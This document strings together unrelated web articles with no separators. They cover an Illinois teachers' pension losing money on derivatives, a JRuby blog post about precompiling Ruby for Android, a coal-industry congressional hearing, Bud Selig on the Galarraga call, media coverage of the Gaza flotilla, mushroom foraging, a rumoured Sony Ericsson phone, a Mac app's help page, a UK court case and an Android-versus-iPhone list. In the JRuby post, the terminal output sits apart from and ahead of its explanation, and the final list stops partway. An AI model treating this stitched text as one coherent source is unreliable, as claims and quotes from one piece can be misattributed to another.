The cost of a five - year credit - default swap for the state rose 2 basis points today to 304.64 basis points , or $ 304,640 per $ 10 million of debt according to CMA DataVision .
Illinois Loses $ Billions on OTC Derivatives
Dale Rosenthal , a former strategist for Long Term Capital Management , the hedge fund known for its epic collapse in 1998 , and a proprietary trader for Morgan Stanley , has seen his share of financial complexities .
But when shown a seven - page list of derivatives positions held by the Illinois Teachers Retirement System as of March 31 , obtained by Medill News Service through a Freedom of Information Act request , the University of Illinois - Chicago assistant professor of finance expressed disbelief .
“ If you were to have faxed me this balance sheet and asked me to guess who it belonged to , I would have guessed , Citadel , Magnetar or even a proprietary trading desk at a bank , ” Rosenthal said .
How bad is it ?
After losing $ 4.4 billion on investments in fiscal year 2009 , and 5 percent on investments in fiscal 2008 , the teachers ’ pension is now underfunded by $ 44.5 billion , or 60.9 percent , according to the Commission on Government Forecasting and Accountability ’s March 2010 report .
By comparison , only 20.3 percent of the Chicago Teachers ’ Pension Fund is unfunded .
For the quarter ended March 31 , according to derivatives experts who studied TRS ’ financial documents , the fund lost some $ 515 million on its derivatives portfolio .
Since then , the fund ’s derivatives positions have likely soured further , the experts said , due to worsening financial conditions in Europe .
The teachers ’ fund denies it ’s currently losing money on its derivatives , and in a statement said its investment strategy , which has included OTC derivatives for the past 27 years , is up 9.7 percent during that same time period .
That ’s better than the fund ’s 8.5 percent target return rate .
Further , a TRS spokesman said derivatives represented just 2 percent of the $ 4.4 billion fiscal 2009 loss .
Still , TRS has the fourth - riskiest investment portfolio for a pension fund in the U.S. , with fully 81.5 percent of its investments considered risky , according to a Pensions & Investments study based on 2008 data .
( The Commonwealth of Pennsylvania State Employees ’ Retirement System was considered the riskiest with 86.1 percent of its investments considered risky . )
Joshua Rauh , an associate professor at Northwestern University ’s Kellogg School of Management , said TRS is taking a calculated risk .
“ If its annual return is lower than 8 percent , TRS will have to admit that it ’s in even worse shape than it is , ” Rauh said .
“ They ’re under incredible pressure to meet return targets and that ’s when more exotic instruments start to looking appealing . ”
TRS is selling OTC derivatives because , Rauh said , it needs the money today and hopes economic events do n’t occur that would force the fund to pay out to the buyers on the other side of the contracts , a strategy one derivatives trader dubbed “ collecting nickels ahead of the bulldozer . ”
What JRuby 's Compiler Produces
# foo.rb
class Foo
def bar ; end
end
def hello ; end
ruby.jit.FILE_351347C9126659D4479558A2706DBC35E45D16D2
The Good News
~/ projects / jruby ➔ jrubyc foo.rb
Compiling foo.rb to class foo
~/ projects / jruby ➔ jrubyc -- sha1 foo.rb
Compiling foo.rb to class ruby .
jit.
FILE_351347C9126659D4479558A2706DBC35E45D16D2
~/ projects / jruby ➔ jruby - X+C -J - Djruby.jit.debug=true -e " require ' foo ' "
...
found jitted code for ./ foo.rb at class : ruby .jit.FILE_351347C9126659D4479558A2706DBC35E45D16D2
...
both
~/ projects / jruby ➔ jrubyc -t /tmp -- sha1 lib/ruby /1.8/
Compiling all in '/ Users/headius/projects/jruby/lib/ruby/1.8'...
Compiling lib/ruby / 1.8//abbrev.rb to class ruby.jit.FILE_4F30363F88066CC74555ABA5BE4B73FDE323BE1A
Compiling lib/ ruby /1.8//base64.rb to class ruby .jit.FILE_DD42170B797E34D082C952B92A19474E3FDF3FA2
Compiling lib/ruby/1.8//benchmark.rb to class ruby .jit.FILE_0C42EBD7F248AF396DE7A70C0FBC31E9E8D233DE
...
Compiling lib/ruby/1.8//xsd/xmlparser/rexmlparser.rb to class ruby.jit.FILE_8B106B9E9F2F1768470A7A4E6BD1A36FC0859862
Compiling lib/ ruby/1.8//xsd/xmlparser/xmlparser.rb to class ruby.jit.FILE_AF51477EA5467822D8ADED37EEB5AB5D841E07D9
Compiling lib/ ruby/1.8//xsd/xmlparser/xmlscanner.rb to class ruby.jit.FILE_3203482AEE794F4B9D5448BF51935879B026092C
What About the Handles ?
~/ projects / jruby ➔ jrubyc -- sha1 -- handles foo.rb
Compiling foo.rb to class ruby .
jit.
FILE_351347C9126659D4479558A2706DBC35E45D16D2
Generating direct handles for foo.rb
~/ projects / jruby ➔ ls ruby / jit/*351347 *
ruby / jit/FILE_351347C9126659D4479558A2706DBC35E45D16D2.class
~/ projects / jruby ➔ ls * 351347 *
ruby_jit_FILE_351347C9126659D4479558A2706DBC35E45D16D2Invokermethod__1$RUBY$barFixed0.class
ruby_jit_FILE_351347C9126659D4479558A2706DBC35E45D16D2Invokermethod__2$RUBY$helloFixed0.class
The Bad News
~/ projects / jruby ➔ mkdir stdlib - compiled
~/ projects / jruby ➔ jrubyc -- sha1 -- handles -t stdlib - compiled / lib/ruby / 1.8 /
Compiling all in '/ Users/headius/projects/jruby/lib/ruby/1.8'...
Compiling lib/ruby / 1.8//abbrev.rb to class ruby.jit.FILE_4F30363F88066CC74555ABA5BE4B73FDE323BE1A
Generating direct handles for lib/ ruby /1.8//abbrev.rb
Compiling lib/ ruby /1.8//base64.rb to class ruby .jit.FILE_DD42170B797E34D082C952B92A19474E3FDF3FA2
Generating direct handles for lib/ ruby /1.8//base64.rb
...
Compiling lib/ ruby/1.8//xsd/xmlparser/xmlparser.rb to class ruby.jit.FILE_AF51477EA5467822D8ADED37EEB5AB5D841E07D9
Generating direct handles for lib/ ruby /1.8//xsd/xmlparser/xmlparser.rb
Compiling lib/ ruby/1.8//xsd/xmlparser/xmlscanner.rb to class ruby.jit.FILE_3203482AEE794F4B9D5448BF51935879B026092C
Generating direct handles for lib/ ruby /1.8//xsd/xmlparser/xmlscanner.rb
~/ projects / jruby ➔ find stdlib - compiled / - name \*.class | wc -l
8212
~/ projects / jruby ➔ du - ks stdlib - compiled / ruby
14008 stdlib-compiled/ruby
~/ projects / jruby ➔ du -ks stdlib - compiled /
44784 stdlib - compiled /
constant pools
~/ projects / jruby ➔ cd stdlib - compiled /
~/ projects / jruby / stdlib-compiled ➔ jar cf stdlib - compiled .jar .
~/ projects/jruby/stdlib-compiled ➔ pack200 stdlib-compiled.pack.gz stdlib-compiled.jar
~/ projects / jruby / stdlib-compiled ➔ ls -l stdlib - compiled .*
-rw -r--r-- 1 headius staff 13424221 Apr 30 01:43 stdlib-compiled.jar
-rw -r--r-- 1 headius staff 4051355 Apr 30 01:44 stdlib-compiled.pack.gz
The " dx " Tool
~/ projects / jruby / out ➔ ../../ android-sdk-mac_86/platforms/android-7/tools/dx -- dex --verbose --positions=none -- no-locals --output=stdlib-compiled.dex stdlib-compiled.jar
processing archive stdlib - compiled .jar ...
ignored resource META-INF / MANIFEST.MF
processing ruby / jit/ FILE_003796EE1C0C24540DF7239B8197C183BC7017BB.class ...
processing ruby / jit/ FILE_00499F5FE29ED8EDB63965B0F65B19CFE994D120.class ...
...
processing ruby_jit_FILE_FEF23DE8CDA5B9BD9D880CBC08D3249158379E58Invokermethod__5$RUBY$run_suiteFixed0.class ...
processing ruby_jit_FILE_FEF23DE8CDA5B9BD9D880CBC08D3249158379E58Invokermethod__6$RUBY$create_resultFixed0.class ...
trouble writing output : format == null
What Can We Do ?
~/ projects / jruby ➔ ls -l *.dex
-rw -r--r-- 1 headius staff 3718340 Apr 30 00:57 stdlib-compiled-solo.dex
-rw -r--r-- 1 headius staff 8656300 Apr 30 00:52 stdlib-compiled-handles.dex
~/ projects / jruby ➔ jar cf blah .
apk *.dex
~/ projects / jruby ➔ ls -l blah.apk
-rw -r--r-- 1 headius staff 3179625 Apr 30 02:01 blah.apk
I originally started to send this to the JRuby dev list and to the Ruboto list , but realized quickly that it might make a good blog post .
Since I do n't blog enough lately , here it is .
I 've been looking into better ways to precompile Ruby code to classes for deploy on Android devices .
Normally , JRuby users can just jar up their .rb files and load and require them as though they were on the filesystem ; JRuby finds , loads , and runs them just fine .
This works well enough on Android , but since there 's no way to generate bytecode at runtime , JRuby code that is n't precompiled must run interpreted forever ... and run a bit slower than we 'd like because of it .
In order for Ruby to be a first - class language for Android development , we must make it possible to precompile Ruby code * completely * and bundle it up with the application .
So this evening I spent some time making that possible .
I have some good news , some bad news , and some good news .
First , a bit of background into JRuby 's compiler .
JRuby 's ahead - of - time compiler produces a single .class file per .rb file , to ease deployment and lookup of those files ( and because I think it 's ugly to always vomit out an unidentifiable class for every method body ) .
This produces a nice 1:1 mapping between .rb and .class , but it comes at a cost : since those .class files are just " bags of methods " we need to bind those methods somehow .
This usually happens at runtime , with JRuby generating a small " handle " class for every method as it is bound .
So for a script like this :
You will get one top - level class file when you AOT compile , and then two more class files are generated at runtime for the " handles " for methods " bar " and " hello " .
This provides the best possible performance for invocation , plus a nice 1:1 on - disk format ... but it means we 're still generating a lot of code at runtime .
The other complication is that jrubyc normally outputs a .class file of the same name as the .rb file , to ease lookup of that .class file at runtime .
So the main .class for the above script would be called " foo.class " .
The problem with this is that " foo.rb " may not always be loaded as " foo.rb " .
A user might load '../ yum /../ foo.rb ' or some other peculiar path .
As a result , the base name of the file is not enough to determine what class name to load .
To solve this , I 've introduced an alternate naming scheme that uses the SHA1 hash of the * actual * content of the file as the class name .
So , for the above script , the resulting class would be named :
While this is n't a pretty name , it does provide a way to locate the compiled version of a script universally , regardless of what path is used to load it .
I 've modified jrubyc ( on master only ... we need to talk about whether this should be a late addition to 1.5 ) to have a new -- sha1 flag .
As you might guess , this flag alters the compile process to generate the sha1 - named class for each compiled file .
This is actually finding the foo.rb file , calculating its SHA1 hash , and then loading the .class file instead .
So if you had a bunch of .rb code for an Android application and wanted to precompile it , you 'd run this command to get the sha1 classes , and then includethe .rb file and the .class file in your application ( the .rb file must be there because ... you guessed it ... we need to calculate the sha1 hash from its contents ) .
To test this out , I actually ran jrubyc against the Ruby stdlib to produce a sha1 class for every .rb file :
This produces 524 class files for 524 .rb files , just as it should , and running with forced compilation ( - X+C ) and jruby .
jit.debug=true shows that it finds each class when loading anything from stdlib .
That 's a good start !
I mentioned above that we also generate , at runtime , a small handle class for every bound method in a given script .
And again , since we can't generate bytecode on - device , we need a way to pregenerate all those handles .
An hour 's worth of work later , and jrubyc has a -- handles flag that will additionally spit out all method handles for each script compiled .
Here 's our foo script compiled with -- sha1 and -- handles , along with the resulting .class files :
And sure enough , we can also see that these handles are being loaded instead of generated at runtime .
So it 's possible with these two options to * completely * precompile JRuby sources into .class files .
Hooray !
My next step was obviously to try to precompile and dex the entire Ruby standard library .
That 's 524 files , but how many method bodies ?
We 'd need to generate a handle for each one of them .
Wowsers , that 's a lot of method bodies .. over 7500 of them .
But of course this is the entire Ruby standard library , with code for network protocols , templating , xml parsing , soap , and so on .
Now for the more frightening numbers : keeping in mind that .class is a pretty verbose file format , how big are all these class files ?
Yeeow !
The standard library alone ( without handles ) produces 14MB of .class files , and with handles it goes up to a whopping 44MB of .class files !
That seems a bit high , does n't it ?
Especially considering that the .rb files add up to around 4.5MB ?
Well there 's a few explanations for this .
First off , the generated handles are rather small , around 2 k each , but they each are probably 50 % the exact same code .
They 're generated as separate handles primarily because the JVM will not inline the same loaded body of code through two different call paths , so we have to duplicate that logic repeatedly .
Java 7 fixes some of this , but for now we 're stuck .
The handle classes also share almost identical , or in - file tables of strings .
Many of the same characteristics apply to the compiled Ruby scripts , so the 44MB number is a bit larger than it needs to be .
We can show a more realistic estimate of on - disk size by compressing the lot , first with normal " jar " , and then with the " pack200 " utility , which takes greater advantage of the .class format 's intra-file redundancy :
Now we 're seeing more reasonable numbers .
A 13MB jar file is still pretty large , but it 's not bad considering we started with 44MB of .class files .
The packed size is even better : only 4MB for a completely - compiled Ruby standard library , and ultimately * smaller * than the original sources .
So what 's the bad news ?
It obviously was n't the size , since I just showed that was a red herring .
The bad news is when we try to dex this jar .
The Android SDK ships with a tool called " dx " which gets used at build time to translate Java bytecode ( in .class files , . jar files , etc ) to Dalvik bytecode ( resulting in a .dex file .
Along the way it optimizes the code , tidies up redundancies , and basically makes it as clean and compact as possible for distribution to an Android device .
Once on the device , the Dalvik bytecode gets immediately compiled into whatever the native processor runs , so the dex data needs to be as clean and optimized as possible .
Every Java application shipped for Android must pass through dx in some way , so my next step was to try to " dex " the compiled standard library :
Uh -oh , that does n't look good .
What happened ?
Well it turns out that the Ruby standard library * plus * all the handles needed to bind it is too much for the current dex file format
It 's a known issue that similarly bit Maciek Makowski ( reported of the linked bug ) when he tried to dex both the Scala compiler and the Scala base set of libraries in one go .
And similar to his case , I was able to successfully dex * either * the precompiled stdlib * or* the generated handles ... but not both at the same time .
It appears that for the moment , it 's not going to be possible to completely precompile the entire Ruby standard library .
But there 's ways around that .
First off , probably no application on the planet needs the entire standard library , so we can easily just include the files needed for a given app .
That may be enough to cut the size down tremendously .
It 's also perfectly possible to build a very complicated Ruby application for Android that will easily fit into the current dex format ; I doubt most mobile applications would result in 4.5 MB of uncompressed .rb source .
So the added -- sha1 and -- handle features will be immediately useful for Android development .
Secondly , I 've been planning on adding a different way to bind methods that does n't require a class file per method .
I would probably generate a large switch for each .rb file and then bind the methods numerically , so only a single additional class ( and only a few methods in that class ) would be needed to bind an entire compiled .rb script .
This issue with dex will force me to finally do that .
And lastly , there 's a bit more good news .
Remember that the packed size of the entire standard library plus handles was around 4MB ?
Here 's the sizes of the dex'ed standard library and handles :
Once dex has worked its magic against our sources , we 're now down to 3.1 MB of compressed code ... a pretty good size for the entire Ruby standard library plus 7500 + noisy , repetitive handles .
We 're definitely within reach of making full Ruby development for Android a reality .
The big three of American coal were called on to the carpet by Congress today - nine days after one of the deadliest mine accidents in history - for trying to block climate change legislation .
Big coal is leading the campaign to defeat a climate and energy bill in Congress and to block the Obama administration from using its regulatory powers in the Environmental Protection Agency ( EPA ) to put curbs on emissions .
Ed Markey , the coal companies ' host today , co-wrote the climate and energy bill they are trying to destroy .
So the welcome from the chair of the house select committee on energy and global warming to the chief executives of Peabody Energy Corporation , Arch Coal Inc , Rio Tinto and the Ohio Coal Association , was a tad - shall we say - frosty .
Today 's hearing was also momentarily disrupted by protesters in surgical masks who dumped handfuls of coal on the table in front of the execs .
Here 's Markey in his opening remarks : " I ask you that you cease efforts to deny the science of global warming and stop spending millions of dollars misleading the public on the true science behind climate change . "
And here 's Michael Carey , president of the Ohio Coal Association , in his : " The role for coal in the new energy age is greatly hampered by the regulatory assault waged by the Obama administration and the Environmental Protection Agency and in particular the ' war on coal ' . "
That earned Carey a sharp reprimand from Democrat Jay Inslee of Washington , who noted that the house version of the climate and energy bill offered $ 60 bn to the coal industry for the development and deployment of clean coal technology .
" We do n't give $ 60 bn to people we are at war with .
We are n't giving $ 60 bn to al - Qaida , " he said .
Today 's hearing also comes barely a week after 29 miners were killed in a West Virginia mine operated by Massey Energy Corp - America 's fourth - largest coal company .
Of America 's coal barons Massey 's CEO , Don Blankenship , is the brashest and least apologetic when it comes to environmental concerns .
In public appearances and on his Twitter feeds , he has denounced global warming as a hoax and lambasted government safety regulations for mines .
The company has been cited tens of thousands of times for environmental and safety violations by government inspectors .
It has paid more than $ 7.6 m in fines for breaching safety regulations .
The executives were whether they agreed with Blankenship that climate change is a hoax .
Peabody , Arch and the Ohio Association have all joined lawsuits challenging the EPA 's authority to regulate emissions .
Carey , in his opening remarks , repeated that position , saying : " We believe that the science undermining the EPA finding is questionable . "
The three other executives on the stand all claimed to believe in the science , just not the need for regulation .
However , Peabody 's Gregory Boyce also said there needed to be an independent review of the UN's Intergovernmental Panel of Climate Change ( IPCC ) and other science .
" We think the EPA should take a step back and do more work . "
Aside from Rio Tinto , the executives were also opposed to the idea of putting mandatory curbs on emissions rather than leaving it to technology to find a cleaner way to burn coal .
So is there a chance for reconciliation ?
Markey , in his closing remarks , said dealing with climate change did not need to be an adversarial process .
But he also made it clear he thought coal industry in America was dying - with or without the prospect of climate change regulation .
No new coal plants were built last year .
America 's use of coal slid from 49 % to 44 % .
Prices , meanwhile , have risen by 60 % in the last five years .
" We do believe there is an inexorable decline .
We see it year after year , " he told the executives .
That may be , but big coal is not giving in yet .
SECAUCUS , N.J. --
Baseball commissioner Bud Selig said Monday that he refrained from awarding Detroit Tigers pitcher Armando Galarraga a perfect game last week because he feared setting a bad precedent and opening a " Pandora 's box . ''
He also pronounced himself " very comfortable " with his decision , even though a sizable percentage of fans and media urged him to make an exception on Galarraga 's behalf .
But Selig also told reporters that he does not see a groundswell of support in baseball circles for greater use of instant replay .
While he will continue to hold discussions with his special committee for on - field matters , he expressed doubt that expanded use of replay will take place during the 2010 season .
" It is interesting , " Selig said .
" Most baseball people are really against instant replay .
There 's no question about that .
I could sense that the last three days [ in talking to people ] .
" In the end , good or bad , I will do what I think is right .
I 'm going to take the responsibility for it .
I 've been at this the last 45 years of my life , and the last 18 [ as commissioner ] , so I 'll trust my own judgment . "
Selig , who appeared at Major League Baseball 's annual draft Monday , made his first public comments on the errant call by umpire Jim Joyce that deprived Galarraga of the 21st perfect game in baseball history .
He expressed regret over the result , but said that Galarraga , Joyce , Detroit manager Jim Leyland and the other parties involved helped turn a negative story into a positive one by acting so professionally and selflessly .
Joyce apologized for his errant call almost immediately , and Galarraga and Leyland refused to dispense blame after the game .
A day after the Tigers ' 3 - 0 victory , Galarraga brought the lineup card to home plate , and tapped a tearful Joyce on the shoulder .
General Motors surprised the pitcher with a 2010 Corvette convertible to help ease the disappointment .
" I do n't want to be trite here , but it really turned out to be a great story , " Selig said .
" You had a pitcher who acted just beautifully .
You had an umpire who did what a lot of people in life should do .
He told the truth -- ' I screwed up ' -- and that was it .
And I have undying admiration and respect for Jim Joyce , as I have told him .
" You have the Tiger fans who acted well , and Jimmy Leyland could not have acted better .
I understand all the sadness around it , but I was really proud of baseball .
That 's as good as any sport has ever confronted a difficult situation , and the credit goes to the parties involved . "
Selig said he will continue to solicit ideas from his 14 - member special committee , which includes managers , general managers , ownership representatives , Hall of Famer Frank Robinson and political columnist George Will .
But he made it clear that baseball wo n't rush to expand the use of replay beyond settling dispute home run calls .
Amid a public furor over the state of umpiring in the game , Selig said public concerns about umpiring are nothing new .
But they 've become a major topic of conversation after recent incidents involving umpires Bill Hohn , Angel Hernandez and Joe West , along with the blown call by Joyce .
" I can remember as a kid in the 50s , listening to complaints about umpiring : ' God , it 's awful .
It 's terrible .
What are they gonna do ? ' " Selig said .
" Here we are 60 years later and we seem to be doing OK .
" This has gone on for 130 years .
You learn after a while there 's nothing new .
Grumbling about umpires has gone on since the day they first threw the ball in 1865 to ' 70 . "
Jerry Crasnick covers baseball for ESPN.com .
This is amazing .
The Israeli government held the hundreds of illegally - arrested people from the Gaza Flotilla incommunicado for several days to give Israel ’s version of the deadly raid time to harden .
But yesterday , Israel started to release and deport the prisoners .
The London Financial Times then did exactly what a newspaper is supposed to do ; it asked the detainees for their side of the story .
In a short article , Vita Bekker found people like Norazma Abdullah , from Malaysia , who challenged the Israeli account :
[ The Israeli commandos ] fired with some rubber bullets , but after some time they used live ammunition .
Five were dead on the spot , and after that we surrendered .
Let us turn now to The New York Times .
In today ’s print edition , the main article , on page 1 , is not directly about the Gaza Flotilla at all — but a dispatch from Washington quoting " senior American officials " suggesting Israel should relax the blockade .
Inside the paper , on page 4 , we do see a story about the actual events , written by Michael Slackman , with contributions from 4 other Times reporters .
The story repeats the Israeli version , that
soldiers opened fire when they said they were attacked by passengers with chains , knives , bars and clubs .
But none of The Times ’s army of correspondents found a single activist to interview .
The Times did manage to locate Ehud Barak , the Israeli defense minister , and a couple of Israeli experts , but not one of the people who had just seen ( at least ) 9 people killed were worthy of inclusion .
The current online version of the Times story still has no direct quotes from the actual participants , although it adds the news that one of the dead may have been an American citizen ( of Turkish background ) .
But it does include an intriguing revelation ,
The senior Turkish official also said forensic examination of the bodies showed that one of the dead had been shot at very close range .
This startling new fact is buried in the 7th paragraph of the online article .
Will The Times pursue this angle ?
Or will we continue to have to look at other publications to find out the simple truth ?
P.S. Keith Olbermann interviewed Ambassador
Peck yesterday , Peck was aboard .
If you 're in the mood for a little culinary adventure you can head out into the woods and find a surprising number of edible wild mushrooms .
Check out this guide to help you find the delicious mushrooms hiding in your own backyard .
Advertisement
Mushrooms grow abundantly all over the world .
You 've likely got dozens of edible varieties growing right in your backyard and local woodlands .
The web site Foraging Guide catalogs edible mushrooms — and poisonous ones too to help you avoid any mishaps — with extremely detailed descriptions .
Not only do you get photographs of the mushrooms but the descriptions cover the stem and cap , the size of the pores and the spores the mushroom releases , what habitat you 'll find the mushrooms in , and what season to look for them .
Advertisement
The most important information of course is the edibility and the eating / preserving notes .
There you 'll find a wealth of information like how best to prepare the variety of mushroom you 're researching if it's not just edible but also delicious , and what kind of flavors to expect .
If you 're heading out into the woods this weekend to try your hand at mushroom collecting here 's a pro-tip I gleaned years ago from an old Morel hunter — Morels are a delicious and much prized wild mushroom .
Use a mesh laundry bag to collect your mushrooms and swing it gently as you walk .
As you swing the mushrooms through the air they will release spores , ensuring a healthy crop of new mushrooms for you and future mushroom foragers .
Check out the full guide at the link below .
Foraging Guide [ via MakeUseOf ]
launching in the fall
Well , this is just great timing .
What we 're looking at here is supposedly a Sony Ericsson smartphone , which seems to sport a five - inch screen and a hinged slide - out keyboard like the HTC Shift and the Eking S515 .
Even if this prototype turns out to be legit , our tipster -- who has a solid track record -- says it 's only running on Android 2.1 and that development is in its infancy while low - level drivers are being tested .
Well , we can probably wait , except we 're also told that internally SE does n't appear to have any plans for 2.2 yet .
Cue the angry tomatoes and eggs , but bring us a PSP phone any day and we 'll call off the rally . :
We 've received word from a second highly - trusted source who says that the display is 5.5 inches ( too big to fit in the front pocket ) , and runs a clean Android 2.1 install .
Oh , and it's :
We 've been told that the device has now been pushed to CES 2011 .
Isolator
Isolator is a small menu bar application that helps you concentrate .
When you 're working on a document , and do n't want to be distracted , turn on Isolator .
It will cover up your desktop and all the icons on it , as well as the windows of all your other applications , so you can concentrate on the task in hand .
Isolator is designed to stay out of your way , and so it is n't loaded with flashy features .
However , it is customizable so you can get it to do exactly what you want .
Options include :
Hide the Dock when you activate Isolator ( Mac OS X 10.5 + only )
Customize the background window ( including semi- transparency and blur )
' Hide ' background windows , as well as covering them up ( they 're just covered up by default )
Customize the shortcut key ( normally shift - command - i )
Disable the menubar icon
Left - clicking the menubar icon can activate Isolator
Automatically launch Isolator when you log in
Note :
The methods that Isolator uses have not been ported by Apple for 64 - bit applications .
Since mac OS Catalina only supports 64 - bit applications , Isolator will no longer work .
A complete rewrite would be needed , and may not even be possible .
Sorry !
Get Isolator !
Download here ( for Mac OS X 10.4 - 10.14 ) only : Testing version ( 4.99 beta ) .
Isolator will not work on 10.15 +
Install Isolator by mounting the disk image and dragging Isolator to the Applications folder .
Stay up to date by subscribing to RSS appcasts for stable versions only or all new versions ( including betas ) .
Using Isolator
Start Isolator by double - clicking it in your Applications folder .
It will install a small square icon in your menu bar .
To turn Isolator on , click on the menu bar icon and select ' Turn Isolator On ' from the menu that appears .
You can turn it off the same way .
Alternatively , you can press ' shift - command - i ' to turn it on and off .
You can always access the Preferences ( even if you 've disabled the menu icon ) using the hotkey ' shift - command - option - i ' .
And , if you customized Isolator so that left - clicking the menu icon activates Isolator , you can still get to the menu using right - click or control - click .
FAQ
Can Isolator cover up or dim the menu bar ?
No , this is only possible using dodgy techniques .
This feature wo n't be added to Isolator .
No , this is only possible using dodgy techniques .
This feature wo n't be added to Isolator .
I have multiple monitors .
How can I make Isolator only affect one of them ?
There is a hidden preference that makes Isolator only affect the ' main display ' ( i.e. the one with the menu bar on it ) .
To use this , quit Isolator .
Launch Terminal.app .
Type : defaults write eu.willmore.isolator HideOnMainScreenOnly 1 Quit Terminal and restart Isolator .
To undo this later , do the same but with 0 instead of 1 .
There is a hidden preference that makes Isolator only affect the ' main display ' ( i.e. the one with the menu bar on it ) .
To use this , quit Isolator .
Launch Terminal.app .
Type : Quit Terminal and restart Isolator .
To undo this later , do the same but with 0 instead of 1 .
Can I change the Preferences hotkey ?
You can , with a bit of effort !
Download KeyCodes .
Click in the ' Record Shortcut ' box .
Press your desired keyboard shortcut .
Now quit Isolator , and run Terminal.app .
Then type : defaults write eu.willmore .Isolator PrefsHotkey KEYCODE defaults write eu.willmore.Isolator PrefsHotkeyFlags COCOAFLAGS
where KEYCODE is the value in the ' Key code ' box in KeyCodes , and COCOAFLAGS is the value in the ' Cocoa flags ' box .
For example , to set the shortcut to shift - apple - J , you would type : defaults write eu.willmore .
Isolator PrefsHotkey 38 defaults write eu.willmore.Isolator PrefsHotkeyFlags 1179648
You can , with a bit of effort !
Download KeyCodes .
Click in the ' Record Shortcut ' box .
Press your desired keyboard shortcut .
Now quit Isolator , and run Terminal.app .
Then type : where KEYCODE is the value in the ' Key code ' box in KeyCodes , and COCOAFLAGS is the value in the ' Cocoa flags ' box .
For example , to set the shortcut to shift - apple - J , you would type : Can I use a custom window filter instead of blur etc ?
Probably , but this is ' advanced use ' and you may well end up with bad results .
Example usage : defaults write eu.willmore.Isolator CustomFilter CIGaussianBlur defaults write eu.willmore.Isolator CustomFilterOptionName inputRadius defaults write eu.willmore.Isolator CustomFilterOptionMultiplier 2
See the Core Image Reference for details of the filters you can use , but many do n't work well in this situation .
Probably , but this is ' advanced use ' and you may well end up with bad results .
Example usage : See the Core Image Reference for details of the filters you can use , but many do n't work well in this situation .
I got confused and messed up these hidden preferences .
Help ?
Delete the file ~/ Library / Preferences/eu.willmore.Isolator.plist in your home directory .
This will get rid of all your Isolator preferences , and return you to a clean slate
Known bugs
If you experience a crash when using the Preferences window , it is because your preferences have become corrupt .
Please send me a copy of the file ~/ Library / Preferences/eu.willmore.Isolator.plist so I can debug the problem .
Then delete your own copy .
You 'll have to set up your preferences again from scratch .
There are some glitches with when Exposé and Spaces are used .
Contribute !
The source code is on GitHub .
Contact & Donations
Bug reports , suggestions , etc to bdeb at willmore dot eu .
If you like Isolator , please consider donating a few dollars .
Donations are greatly appreciated !
Latest Teesside headlines straight to your inbox Subscribe Thank you for subscribing See our privacy notice Invalid Email
A DAD was repeatedly called stupid as a court heard how he caused his one - year - old son to lose four toes in a horrific accident .
Teesside Crown Court heard how Matthew Thompson was sitting on an off - road mini-motorbike with dad Peter when his sock got caught in the chain guard .
His shoeless foot was then dragged into the machine - severing four of his toes .
Prosecutor David Ward explained how Peter Thompson had bought Matthew the off - road bike for his first birthday .
At about 3.20 pm on October 14 Thompson sat the one - year - old on the petrol tank of the machine while he was in the saddle .
The pair then began riding around their back garden before the horrific accident occurred .
When the 28 - year - old dad realised what had happened , an ambulance was called and the youngster was taken to hospital .
Surgeons were able to reattach one of the four toes .
After hearing the evidence the judge , Recorder Anton Lodge QC , said : “ This was a single act of stupid folly , it was in no way directed to either intentionally or recklessly hurt the child . ”
Defence barrister Andrew Turton replied : “ No intention at all .
He is completely remorseful for his stupidity in placing the one - year - old child on the motorbike .
“ It was a moment of madness from Peter Thompson .
He has a close relationship with his young son and the young child continues to thrive in his and his wife ’s care .
“ It is an incident that the child , to a degree , has been able to put behind him .
He is walking and functioning as any normal child and is as well as can be expected in the circumstances . ”
He added : “ Mr Thompson obviously bears the burden of one day having to explain to him why his foot is in that condition . ”
Thompson , of Craven Street , Middlesbrough , pleaded guilty to cruelty to a person under 16 .
Recorder Lodge said : “ The facts of this offence are very unusual because this offence is there to protect young children from being ill treated or neglected by parents or other adults - that ’s not really the position in this case .
“ What you did Thompson was an act of gross stupidity .
You decided that to celebrate your one - year - old son ’s first birthday you would buy an off - road motorbike .
You were on the bike and he was sitting in front of you as he only could with your assistance being only one year old .
“ The pain that he must have suffered would have been very great indeed - far greater than you have ever had .
“ It is greatly to the credit and the skills of the surgeons that one of those toes was reconnected .
I ’m told the young boy is coping well with the loss of the other three toes .
“ The fact he is doing that reflects credit on you and your wife .
He is doing well under your care . ”
The judge gave Thompson a 12 - month community order with supervision and ordered him to complete 60 hours ’ unpaid work .
Since its 2008 debut , Android has grown - not only meeting all of the functionalities of the iPhone , but besting it in nearly all aspects .
Here is our list of the top 10 things Android does better than the iPhone .
Advertisement
1 : Android can Run Multiple Apps at the Same Time
Advertisement
Starting with version 1.0 , Android has been able to run multiple applications at the same time regardless of whether they are system apps or apps from the Android Marketplace .
The current version of iPhone OS does offer limited multitasking , but only allows native applications such as Mail , iPod and Phone to run in the background .
Android users benefit greatly from this discrepancy , as they can receive notifications , listen to music , or even record GPS data without keeping the application open .
Apple will try to level the playing field with iPhone OS 4 , granting developers access to a small and limiting list of APIs that can run certain services in the background , but it 's a long way from the true multitasking that Android has .
2 : Android Keeps Information Visible on Your Home Screen
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
One of the key features Android has is a customizable home screen keeps active widgets right at your fingertips , always accesible and always visible - without having to launch an application first .
There are widgets for just about every app in the Android Marketplace from playing music to checking the weather and keeping up to date on Facebook .
Meanwhile iPhone users are force to flip through their app list to locate and launch each app .
If you wanted to check the forecast , for example , you would have to find the app , launch it , and then wait for it to load .
With Android , all of that information can be displayed directly on your home screen , never more than a finger swipe away .
3 : Android Has a Better App Market
Advertisement
It 's true that Apple 's App Store has over 180,000 applications , while the Android Marketplace has only just broken the 50,000 mark but Android 's rapid growth and adoption give it the potential to catch up to the iPhone App Store .
Android also has another advantage : a completely open market .
Apple receives around 10,000 app submissions per week , yet many apps are overlooked because they appear too simple or denied because a similar app already exists .
The Android Marketplace is driven entirely by its consumers , so the best app is the one that succeeds - not the first one to reach the market .
In addition , the Android Marketplace does n't censor its apps , so the possibilities are truly endless .
4 : Android Gives You Better Notifications
Advertisement
The iPhone has some trouble with notifications .
Because it 's restricted to pop -up notifications , it can only handle one at a time and because it lacks multitasking , applications must be open in order for them to make notifications .
Android , on the other hand , has a convenient notification bar which displays an icon for every notification you have waiting .
The notification bar can also be pulled downward to reveal more detail about each notification .
Android also allows app developers to make notification details viewable from the lock screen , something the iPhone can only do with native applications .
5 : Android Lets You Choose Your Hardware
Advertisement
Apple users are encouraged to " Think Different " but when it comes to the actual hardware , they do n't get much choice .
